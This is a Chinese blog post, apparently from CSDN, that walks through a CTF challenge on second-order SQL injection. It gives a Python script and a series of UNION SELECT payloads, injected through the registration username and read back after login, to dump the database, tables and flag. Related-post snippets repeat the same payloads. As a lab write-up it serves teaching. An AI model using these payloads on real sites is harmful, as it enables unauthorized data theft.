October 2019 Twice SQL Injection

已于 2024-05-16 18:30:49 修改
阅读量233 收藏 5
点赞数 3
分类专栏: CTF-Web 文章标签: mongodb web安全
于 2024-05-16 18:29:40 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2302_79839194/article/details/138971319
版权

October 2019 Twice SQL Injection

知识点:

  • sql二次注入
  • 学习脚本编写
  • Mongodb数据库的一些了解

题解:

我自己独立测试的时候,发现了转义 ==> 二次注入;其他没发现什么了。。。

怎么说呢,我觉得这个题适合我们练习脚本的编写,方法是最简单的联合注入(union select),但需要保持会话(session)

注入点:注册页面的Username处

回显点:用注册好的登录进去

import requests
from bs4 import BeautifulSoup

url = "http://795fc04e-64d9-4217-939c-f766000be17b.node5.buuoj.cn:81/?action="

# payload注入在url1上,保持会话,登录查询回显

# 查数据库名字: ctftraining
# payload = "1' union select database()#"
# 查表名 flag,news,users
# payload = "1' union select group_concat(table_name) from information_schema.tables where table_schema='ctftraining'#"
# 查列名 flag
# payload = "1' union select group_concat(column_name) from information_schema.columns where table_name='flag'#"
# 查字段值 
payload = "1' union select flag from flag#"

url1 = url + "reg"
url2 = url + "login"

data = {
    'username':payload,
    'password':'1'
}

r = requests.session() # 保持会话,因为这个题的环境涉及了登录

res1 = r.post(url=url1, data=data)
res2 = r.post(url=url2, data=data)

html = res2.text
soup = BeautifulSoup(html, 'html.parser')
result = soup.div.text
print("[*]" + result)

这里的bs4模块,只是让结果更简洁,去掉了html的标签,不要这个也没事,下载方法自己百度吧,因为我也是百度的,我自己只会pip instlal +模块名字 -i 清华源

无非就是注意自己的python版本,有时候编者用的python2编写,但你的环境是python3, 而有些模块在不同python版本的名字是不一样的

下载模块的时候无非就是注意这几点,其他没什么的。

参考:

WriteUp

Mongodb

Liqd
关注
  • 3
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
Twice New Tab-crx插件
03-23
TWICE,待办事项列表,天气等替换新的标签页! 将新标签页替换为TWICE,待办事项列表,天气等!! 您可以使用天气制作个人仪表板,做清单,图像/视频大约两次以上。 放置旧的新标签页-仅向您显示您最近访问过的...
TwICE-开源
05-01
"TwICE-开源" 指的是一个名为 "TwICE" 的开源项目,它基于Java语言实现。这里的"开源"意味着该项目的源代码是公开的,允许社区成员查看、学习、修改并分发代码。 **描述详解:** 描述中提到的 "信息和内容交换...
buuctf XCTF October 2019 Twice SQL Injection 二次注入原理+题解
AAAAAAAAAAAA66的博客
12-21 2215
这里要吐槽一点XCTF,之前翻题目时发现有道10分的,还是二次注入,还是0人做出,看了write up觉得还挺简单,就想混着写一下,结果0人做出的原因居然是环境打不开。然后在buuctf 平台找到了这道题,所以就试着写下write up。 目录 二次注入 二次注入的成因 二次注入常出现的地方 题解 思路 步骤 二次注入 二次注入的成因 由于开发者为了防御sql注入,使网站对我们输入的恶意语句中的一些重要的关键字进行了转义,使恶意的sql注入无法执行(比如说将单引号转义...
BUU刷题记录——5
weixin_43610673的博客
09-21 1494
October 2019 Twice SQL Injection 由题目名可知为二次注入 username =1' union select database() # username =1' union select group_concat(table_name) from information_schema.tables where table_schema='ctftraining' # username =1' union select group
buuctf-web-October 2019 Twice SQL Injection1
mlws1900的博客
03-12 226
重新注册账号为admin' union select database()#,密码123456(此处此方法无用,账号必须是数字)随后就是sql注入常规操作,爆库爆表爆字段读内容,继续注册账户名带注入语句的用户。注册账号为1' union select database()#,密码为123。重新登录,发现显示数据库为ctftraining。到注册界面随便注册一个用户后登录。看这题目,二次注入,打开环境。
BUUCTF--October 2019 Twice SQL Injection
qq_46263951的博客
07-30 1102
根据题目可以知道这是一个二次注入题 注册时把我们sql语句放到username处,登录后即可看到我们想要的信息 payload为: username =1' union select database() # username =1' union select group_concat(table_name) from information_schema.tables where table_schema='ctftraining' # username =1' union select gr
(三)October 2019 Twice SQL Injection
qq_53856457的博客
11-11 3941
标题明说二次注入(有埋伏?),先常规二次注入测试:注册用户名:admin"# 密码:123,并登 录。(此处没有任何过滤?)(info) 进行fuzz测试,结果发现常用符号传入被转义(此页面暂时放弃) 注意还有思路:注册+登录,将sql语句当用户名写入数据库,然后登陆,使语句执行(因为第一次注册登录测试中并未对”#进行waf) 注册尝试 用户名:xxx" union select database()# 密码:123456 登录成功,但无回显,尝试其他闭合方式...
[October 2019]Twice SQL Injection
J_linnb的博客
04-23 453
一. 题目是二次SQL注入,我们先了解一下二次注入原理: 二次注入的原理,在第一次进行数据库插入数据的时候,仅仅只是使用了 addslashes 或者是借助 get_magic_quotes_gpc 对其中的特殊字符进行了转义,但是addslashes有一个特点就是虽然参数在过滤后会添加 “\” 进行转义,但是“\”并不会插入到数据库中,在写入数据库的时候还是保留了原来的数据。 在将数据存入到了数据库中之后,开发者就认为数据是可信的。在下一次进行需要进行查询的时候,直接从数据库中取出了脏数据,没有进行进一
buu-October 2019 Twice SQL Injection
qaq517384的博客
10-26 527
标题朴实无华的二次注入 两个注入点,注册和改info rua' union select database() # 在注册的user处可以找到二次注入点 没有特殊的过滤,四步正常走就行 rua' union select database() # rua' union select group_concat(table_name) from information_schema.tables where table_schema='ctftraining' # rua' union select gro
DDD领域驱动设计_领域驱动设计_twice9t6_
09-30
领域驱动设计(DDD)是一种软件开发方法,由Eric Evans在其2003年的著作《领域驱动设计:软件核心复杂性的应对之道》中提出。DDD旨在通过深入理解和建模业务领域来提升软件开发效率,使软件更好地适应复杂的业务需求...
Exercise(3-1a).zip_Euler_cstr_matlab_twice1de
07-15
"twice1de"可能是指该问题涉及到两个一阶微分方程。在CSTR模型中,通常会有一个反应进度的微分方程和一个能量平衡的微分方程,两者可能都需要用到欧拉方法或者其他数值解法进行求解。 在Exercise(3-1a)这个文件中,...
基于与STM32的加湿器之温湿度驱动
最新发布
weixin_44453694的博客
07-10 736
DHT11 数字温湿度传感器是一款含有已校准数字信号输出的温湿度复合传感器。它应用专用的数字模块采集技术和温湿度传感技术,确保产品具有枀高的可靠性与卓越的长期稳定性。传感器包括一个电容式感湿元件和一个 NTC 测温元件,并与一个高性能 8 位单片机相连接。
docker部署redis/mongodb/
salonzhou的专栏
07-07 203
创建/root/redis/conf/redis.conf。部署成功,用工具连接。
【后端开发实习】用MongoDB实现仓库管理的出库入库实战
weixin_73074012的博客
07-10 602
Mongodb是一种比较常见的NoSQL类型数据库,所谓NoSQL就是Not only SQL,非关系型数据库,数据在MongoDB中的存储相比MySQL而言比较松散,并没有特定的数据结构,存储方式类似JSON,采用了一种二进制的BSON来进行数据存储。但是MongoDB由于以下的几个优势在互联网需要处理海量数据场景下有独特的优势,比较经典的应用场景有微信和Twitter每天数以TB甚至PB级别的数据量。高性能高可用高扩展丰富的查询支持。
0302GPIO外设输入功能
qq_43701785的博客
07-09 656
抖动通常在5-10ms之间,人分辨不出来,但对于高速运行的单片机而言,这就漫长了。所以要对抖动进行过滤,否则会出现按键按一下,单片机反映了多次的现象。按键松手时也会有一段抖动。最简单的方法是软件加一段延时,把抖动时间耗过去这些传感器都是利用传感器元件,比如光线越强,光敏电阻的阻值越小温度越高,热敏电阻的阻值越小红外光线越强,红外接收管的阻值越小。但是电阻的变化不易被直接观察,所以一般通过分压来输出N1代表可变电阻(相对于各传感器,可以对应为光敏电阻、热敏电阻、红外接收管)
Win10安装MongoDB(详细版)
蜗牛哲学的博客
07-07 341
win10安装MongoDB Server
docker-compose mongodb 副本集
nsa65223的专栏
07-10 454
mongodb 使用 keyFile 进行认证,副本集群中的每个节点的 mongodb 使用 keyFile 的内容作为认证其他成员的共享密码。我们运行一下 demo 代码中的添加员工的测试代码,然后就可以在集群连接下和各个节点的连接下看到新创建的 mytest 数据库,以及其下面的 tb_employee 表和数据内容,并且都是一致的。执行 demo 代码中的修改测试代码,然后再启动刚才停掉的容器,最后发现重启后的节点变成了从节点。本篇博客的演示中,没有去设置仲裁节点,3 个节点都保留数据副本。
MongoDB如何安装并配置公网地址实现Navicat远程连接本地数据库
YYDsis的博客
07-06 1333
本文主要介绍如何在Linux Ubuntu系统快速部署MongoDB,并结合cpolar内网穿透工具实现公网远程访问本地数据库。MongoDB服务端可以运行在Linux、Windows、MacOS平台,可以存储比较复杂的数据类型,支持的查询语言非常强大,几乎可以实现类似关系数据库单表查询的绝大部分功能,还可以对数据建立索引。直接实用包管理器安装MongoDB比较复杂,使用Docker安装部署MongoDB则相对简单快速,下面就和大家分享一下具体操作流程。
mybatisplus inSql
08-08
In the example above, we use `inSql` twice. The first call uses a subquery to fetch the user IDs from the `user` table where the age is greater than 18. The second call uses a list of values directly....

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值